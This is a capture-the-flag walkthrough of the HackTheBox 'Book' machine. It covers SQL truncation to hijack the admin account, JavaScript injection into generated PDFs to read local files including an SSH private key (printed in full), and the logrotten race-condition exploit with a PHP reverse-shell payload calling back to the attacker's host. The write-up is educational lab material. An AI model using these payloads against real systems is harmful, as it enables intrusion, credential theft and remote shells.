HackTheBox - Book πŸ“š πŸ“–

HackTheBox β€Ί PenTesting
, , , , , ,

HackTheBox-Book

Quick Summary

β†’ A fun box machine that was vulnerable to sql truncate and local file read via javascript injection. As the attacker I was able to get the admin by bypassing the limit characters of username and password. I created another account to send pdf files which contains javascript payloads which lead to local file read from there I was able to get the SSH keys of the user and use it to get in. To get root access we find logrotten which exploit a race condition and using that we can get a shell as root

Penetration Testing Methodologies

  1. Network Scanning

    β†’ Nmap scan

    β†’ discover open ports and what services are running

  2. Enumeration

    β†’ Found login and registration page

    β†’ username & password has set limit characters in registration form

    β†’ running dirsearch to enumerate potential web directories

    β†’ Found admin login page

  1. Post - Exploitation

    β†’ abusing sql truncation vulnerabilities and create account as admin using admin@htb

    β†’ go to file upload section that generating pdf files.

    β†’ trying to inject malicious javascript payloads to check if is vulnerable to local file read vulnerabilities.

    β†’ local file read vulnerabilities confirmed !

  2. Exploitation

    β†’ create a malicious javascript files which can get info of a user which generated into pdf

    β†’ extract SSH keys of a user and use it get in to shell

    β†’ finally got the user.txt

  3. Privilege Escalation

    β†’ use pspy to monitor running services

    β†’ Looking for exploit for logrotate

    β†’ compile logrotate exploit and make a another payload for reverse shell

    β†’ execute the exploit with payload

    β†’ Finally got the root flag

Network Scanning

Walkthrough

β†’ I always begin at NMAP to look on the services what is running. I always use

  • -sV β‡’ Probe open ports to determine service/version info
  • -sC β‡’ equivalent to β€”script=default
  • -A- β‡’ Agressive scan
  • -oN β‡’ to save our scan results to a text file
# bash

nmap -sV -sC -A 10.10.10.176 -oN nmap-Book

# bash

root in htb/boxes/Book 
❯ nmap -sV -sC -A 10.10.10.176 -oN nmap-Book
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 08:50 PST
Nmap scan report for 10.10.10.176
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/15%OT=22%CT=1%CU=40722%PV=Y%DS=2%DC=T%G=Y%TM=5E965A7
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   250.00 ms 10.10.14.1
2   252.00 ms 10.10.10.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.40 seconds

root in htb/boxes/Book took 37s 
❯


Nmap results

So there’s only 2 port open.

  • 22 β‡’ which is running a SSH Client
  • 80 β‡’ which basically a web service

Enumeration

The Book Website

Since there’s web service I always looking that first

HackTheBox-Book

It’s a login page and there’s also a create account

HackTheBox-Book

I look at the source code and I found something useful, username and password has set to limit characters which can possibly vulnerable to sql truncation

// javascript

<script>
  window.console = window.console || function(t) {};
</script>
<script>
  if (document.location.search.match(/type=embed/gi)) {
    window.parent.postMessage("resize", "*");
  }
function validateForm() {
  var x = document.forms["myForm"]["name"].value;
  var y = document.forms["myForm"]["email"].value;
  if (x == "") {
    alert("Please fill name field. Should not be more than 10 characters");
    return false;
  }
  if (y == "") {
    alert("Please fill email field. Should not be more than 20 characters");
    return false;
  }
}
</script>


There’s also Contact us where you can send message in admin@book.htb

Since there’s no clue what’s the next step here’ i use dirsearch to bruteforce web directories. This is the best thing to do to get hidden stuff on the site.

# bash

root in htb/boxes/Book 
❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.176" -e asd -t 20 --simple-report=directories.Book

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109

Error Log: /opt/dirsearch/logs/errors-20-04-15_08-59-47.log

Target: http://10.10.10.176

[08:59:48] Starting: 
[08:59:53] 403 -  277B  - /.ht_wsr.txt                              
[08:59:53] 403 -  277B  - /.hta
[08:59:53] 403 -  277B  - /.htaccess-dev
[08:59:53] 403 -  277B  - /.htaccess-local
[08:59:53] 403 -  277B  - /.htaccess-marco
[08:59:53] 403 -  277B  - /.htaccess.BAK
[08:59:53] 403 -  277B  - /.htaccess.bak1
[08:59:53] 403 -  277B  - /.htaccess.orig
[08:59:53] 403 -  277B  - /.htaccess.old
[08:59:53] 403 -  277B  - /.htaccess.sample
[08:59:53] 403 -  277B  - /.htaccess.save
[08:59:53] 403 -  277B  - /.htaccess.txt
[08:59:53] 403 -  277B  - /.htaccess_extra
[08:59:53] 403 -  277B  - /.htaccess_orig
[08:59:53] 403 -  277B  - /.htaccess_sc
[08:59:53] 403 -  277B  - /.htaccessBAK
[08:59:53] 403 -  277B  - /.htaccessOLD
[08:59:53] 403 -  277B  - /.htaccessOLD2
[08:59:53] 403 -  277B  - /.htaccess~
[08:59:53] 403 -  277B  - /.htgroup
[08:59:53] 403 -  277B  - /.htpasswd-old
[08:59:53] 403 -  277B  - /.htpasswd_test
[08:59:53] 403 -  277B  - /.htpasswds
[08:59:53] 403 -  277B  - /.htusers
[09:00:03] 301 -  312B  - /admin  ->  http://10.10.10.176/admin/                 
[09:00:04] 200 -    6KB - /admin/                 
[09:00:04] 403 -  277B  - /admin/.htaccess
[09:00:04] 200 -    6KB - /admin/?/login         
[09:00:05] 302 -    0B  - /admin/home.php  ->  index.php                                                    
[09:00:06] 200 -    6KB - /admin/index.php                             
[09:00:29] 403 -  277B  - /docs/                                                                                  
[09:00:29] 301 -  311B  - /docs  ->  http://10.10.10.176/docs/
[09:00:35] 302 -    0B  - /home.php  ->  index.php                                                    
[09:00:36] 301 -  313B  - /images  ->  http://10.10.10.176/images/ 
[09:00:38] 200 -    7KB - /index.php                                                                           
[09:00:38] 200 -    7KB - /index.php/login/
[09:00:59] 403 -  277B  - /server-status                                                                
[09:00:59] 403 -  277B  - /server-status/
[09:01:00] 302 -    0B  - /settings.php  ->  index.php                                                            
                                                                                           
Task Completed                                                                                                                                                                             

root in htb/boxes/Book took 1m27s 
❯


So there’s admin page here. I try to bypass it using basic sql injection but it’s not working :

HackTheBox-Book

Post - Exploitation

Abusing SQL Truncate

remember the registration page that has set limit characters ? The MySQL truncation attack is based on the behaviour of the server when managing special characters like spaces.

In this case if the user send admin@book.htb a the database is going to check if emai are already use by another user. And if not, it is going to cut the username that has max to 20 characters and save a new entry. Because of that I can easily change the admin password. The query is something like this :

# bash

POST / HTTP/1.1
Host: 10.10.10.176
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.176/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
DNT: 1
Connection: close
Cookie: PHPSESSID=eqqo5jp5sildltc2drfng6gn6c
Upgrade-Insecure-Requests: 1

name=medz&email=admin                    a%40book.htb      a&password=admin1234


and the response was :

# bash

HTTP/1.1 302 Found
Date: Wed, 15 Apr 2020 21:54:48 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: index.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


We can now stop the burp suite tool. (Do not follow redirect, sometime it will not work)

Using the create account page, I manage to change the password of admin to password admin1234 and now I can use admin account :

HackTheBox-Book

Exploitation

Local File Read via PDF

Now that I’m the admin the most interesting part is the Collections page where you can download pdf file which contains the name of a users or the collections name.

So, as a PDF is being dynamically created for every user, we can control the part of the input. Like performing XSS Attack to generated pdf.

HackTheBox-Book

the payload is look like this to get the valid user

// javascript

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

next is to download the generated pdf. The pdf contains /etc/passwd info, meaning I confirmed the local file read vulnerabilities

HackTheBox-Book

Now we get the valid user reader

Creating javascript payloads

From this article we can perform local file read and try to get SSH keys the payload is look like this :

// javascript

x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();

Now we will try reupload it again :

HackTheBox-Book

After that go back to collections and download the generated pdf file.

Opening the pdf it contains the SSH keys of the user

# bash

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2JJQsccK6fE05OWbVGOuKZdf0FyicoUrrm821nHygmLgWSpJ
G8m6UNZyRGj77eeYGe/7YIQYPATNLSOpQIue3knhDiEsfR99rMg7FRnVCpiHPpJ0
WxtCK0VlQUwxZ6953D16uxlRH8LXeI6BNAIjF0Z7zgkzRhTYJpKs6M80NdjUCl/0
ePV8RKoYVWuVRb4nFG1Es0bOj29lu64yWd/j3xWXHgpaJciHKxeNlr8x6NgbPv4s
7WaZQ4cjd+yzpOCJw9J91Vi33gv6+KCIzr+TEfzI82+hLW1UGx/13fh20cZXA6PK
75I5d5Holg7ME40BU06Eq0E3EOY6whCPlzndVwIDAQABAoIBAQCs+kh7hihAbIi7
3mxvPeKok6BSsvqJD7aw72FUbNSusbzRWwXjrP8ke/Pukg/OmDETXmtgToFwxsD+
McKIrDvq/gVEnNiE47ckXxVZqDVR7jvvjVhkQGRcXWQfgHThhPWHJI+3iuQRwzUI
tIGcAaz3dTODgDO04Qc33+U9WeowqpOaqg9rWn00vgzOIjDgeGnbzr9ERdiuX6WJ
jhPHFI7usIxmgX8Q2/nx3LSUNeZ2vHK5PMxiyJSQLiCbTBI/DurhMelbFX50/owz
7Qd2hMSr7qJVdfCQjkmE3x/L37YQEnQph6lcPzvVGOEGQzkuu4ljFkYz6sZ8GMx6
GZYD7sW5AoGBAO89fhOZC8osdYwOAISAk1vjmW9ZSPLYsmTmk3A7jOwke0o8/4FL
E2vk2W5a9R6N5bEb9yvSt378snyrZGWpaIOWJADu+9xpZScZZ9imHHZiPlSNbc8/
ciqzwDZfSg5QLoe8CV/7sL2nKBRYBQVL6D8SBRPTIR+J/wHRtKt5PkxjAoGBAOe+
SRM/Abh5xub6zThrkIRnFgcYEf5CmVJX9IgPnwgWPHGcwUjKEH5pwpei6Sv8et7l
skGl3dh4M/2Tgl/gYPwUKI4ori5OMRWykGANbLAt+Diz9mA3FQIi26ickgD2fv+V
o5GVjWTOlfEj74k8hC6GjzWHna0pSlBEiAEF6Xt9AoGAZCDjdIZYhdxHsj9l/g7m
Hc5LOGww+NqzB0HtsUprN6YpJ7AR6+YlEcItMl/FOW2AFbkzoNbHT9GpTj5ZfacC
hBhBp1ZeeShvWobqjKUxQmbp2W975wKR4MdsihUlpInwf4S2k8J+fVHJl4IjT80u
Pb9n+p0hvtZ9sSA4so/DACsCgYEA1y1ERO6X9mZ8XTQ7IUwfIBFnzqZ27pOAMYkh
sMRwcd3TudpHTgLxVa91076cqw8AN78nyPTuDHVwMN+qisOYyfcdwQHc2XoY8YCf
tdBBP0Uv2dafya7bfuRG+USH/QTj3wVen2sxoox/hSxM2iyqv1iJ2LZXndVc/zLi
5bBLnzECgYEAlLiYGzP92qdmlKLLWS7nPM0YzhbN9q0qC3ztk/+1v8pjj162pnlW
y1K/LbqIV3C01ruxVBOV7ivUYrRkxR/u5QbS3WxOnK0FYjlS7UUAc4r0zMfWT9TN
nkeaf9obYKsrORVuKKVNFzrWeXcVx+oG3NisSABIprhDfKUSbHzLIR4=
-----END RSA PRIVATE KEY-----

Grab the user flag

Finally I can now login using SSH and the get the user.txt :

# bash


root in htb/boxes/Book via β¬’ v10.17.0 
❯ ssh -v -i id_rsa reader@10.10.10.176
OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d  10 Sep 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 10.10.10.176 [10.10.10.176] port 22.
debug1: Connection established.
debug1: identity file id_rsa type -1
debug1: identity file id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
debug1: match: OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to 10.10.10.176:22 as 'reader'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:QRw8pCXg7E8d9sWI+0Z9nZxClJiq9/eAeT/9wUfoQQk
The authenticity of host '10.10.10.176 (10.10.10.176)' can't be established.
ECDSA key fingerprint is SHA256:QRw8pCXg7E8d9sWI+0Z9nZxClJiq9/eAeT/9wUfoQQk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.176' (ECDSA) to the list of known hosts.
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: Will attempt key: id_rsa  explicit
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Trying private key: id_rsa
debug1: Authentication succeeded (publickey).
Authenticated to 10.10.10.176 ([10.10.10.176]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending environment.
debug1: Sending env LANG = en_US.utf8
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Apr 15 22:46:04 UTC 2020

  System load:  0.0                Processes:            159
  Usage of /:   28.3% of 19.56GB   Users logged in:      2
  Memory usage: 40%                IP address for ens33: 10.10.10.176
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

114 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Apr 15 20:30:55 2020 from 10.10.14.220
reader@book:~$ 


reader@book:~$ whoami
reader
reader@book:~$ hostname
book
reader@book:~$ ls
backups  backups1  logrotten  lse.sh  psp  user.txt
reader@book:~$ cut -c 4-12 user.txt
d4b5197fa
reader@book:~$


Privilege Escalation

Getting Root Access

In our user reader there is a backups folder in the home directory :

// bash

reader@book:~$ ls
backups  logrotten  lse.sh  psp  user.txt
reader@book:~$

then I check what’s inside on the backup folder :

// bash

reader@book:~$ ls -la backups/
total 12
drwxr-xr-x 2 reader reader 4096 Apr 15 21:38 .
drwxr-xr-x 9 reader reader 4096 Apr 15 21:38 ..
-rw-r--r-- 1 reader reader    0 Apr 15 21:38 access.log
-rw-r--r-- 1 reader reader   91 Apr 15 21:38 access.log.1
lrwxrwxrwx 1 reader reader   22 Apr 15 18:48 bash_completion.d -> /etc/bash_completion.d
reader@book:~/backups$ cat access.log.1 
192.168.0.104 - - [29/Jun/2019:14:39:55 +0000] "GET /robbie03 HTTP/1.1" 404 446 "-" "curl"

so there’s a log file which can be a logs by another user. To monitor the services running on the target machine I use pspy :

// bash

2020/04/14 10:17:39 CMD: UID=0    PID=78202  | sleep 5 
2020/04/14 10:17:44 CMD: UID=0    PID=78205  | /usr/sbin/logrotate -f /root/log.cfg 
2020/04/14 10:17:44 CMD: UID=0    PID=78204  | /bin/sh /root/log.sh 
2020/04/14 10:17:44 CMD: UID=0    PID=78206  | sleep 5

If logrotate is running as root, and ordinary users have write access to the log files polled by logrotate, then there is a vulnerability exploit that can increase rights.

I’ve first verify that access.log is a polled file and write 10M random bitstream data to it :

// bash

reader@book:~/backups$ head -c 10M < /dev/urandom > access.log
reader@book:~/backups$ ls -la
total 10252
drwxr-xr-x 2 reader reader     4096 Jan 29 13:05 .
drwxr-xr-x 7 reader reader     4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log
-rw-r--r-- 1 reader reader       91 Jan 29 13:05 access.log.1
reader@book:~/backups$ ls -la
total 10252
drwxr-xr-x 2 reader reader     4096 Apr 15 02:35 .
drwxr-xr-x 7 reader reader     4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader        0 Apr 15 02:35 access.log
-rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log.1
-rw-r--r-- 1 reader reader       91 Jan 29 13:05 access.log.2

Confirmed ! It’s written another access.log.2 log file .

Logrotten

I downloaded the logrotate exploit from github to my machine, compile then transfer to book machine :

Compile logrotten

// bash


root in htb/boxes/Book via β¬’ v10.17.0 
❯ gcc -o logrotten logrotten.c

Payload for Reverse Shell

then I create another payload for revershell shell :

// bash


root in htb/boxes/Book via β¬’ v10.17.0 took 5m35s 
❯ cat payloadfile
php -r '$sock=fsockopen("10.10.14.121",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

root in htb/boxes/Book via β¬’ v10.17.0 
❯


Transfer it to target machine using wget and execute it :

// bash


reader@book:/tmp$ ./logrotten -p ./payloadfile /home/reader/backups/access.log -d
logfile: /home/reader/backups/access.log
logpath: /home/reader/backups
logpath2: /home/reader/backups2
targetpath: /etc/bash_completion.d/access.log
targetdir: /etc/bash_completion.d
p: access.log
Waiting for rotating /home/reader/backups/access.log...
Renamed /home/reader/backups with /home/reader/backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
Done!
reader@book:/tmp$

Next i check the /etc/bash_completion.d and my payload is written there :

// bash

reader@book:/etc/bash_completion.d$ ls
access.log  access.log-2020041722.backup  apport_completion  cloud-init  git-prompt  grub

reader@book:/tmp$ cat /etc/bash_completion.d/access.log
php -r '$sock=fsockopen("10.10.14.121",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
reader@book:/tmp$

I executed again the exploit and payload and at the same time I setup a ncat listener from my machine. Finally got the root access but’s it will hangup immediately :

// bash

root in htb/boxes/Book via β¬’ v10.17.0 
❯ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.121] from (UNKNOWN) [10.10.10.176] 42610
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
clean_backup.sh
clean.sh
cron_root
log.cfg
log.sh
reset.sh
root.txt
# cat root.txt
Hangup

Executed it again and get the root flag

// bash

root in htb/boxes/Book via β¬’ v10.17.0 took 1m17s 
❯ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.121] from (UNKNOWN) [10.10.10.176] 42626
# cut -c 4-12 root.txt
92adf998
# Hangup

root in htb/boxes/Book via β¬’ v10.17.0 took 55s 
❯

If you liked my writeup please leave a respect on my Profile

Payas0

Referrences:

Logrotten Exploit

Server Side XSS - Dynamic PDF

Local File Read via XSS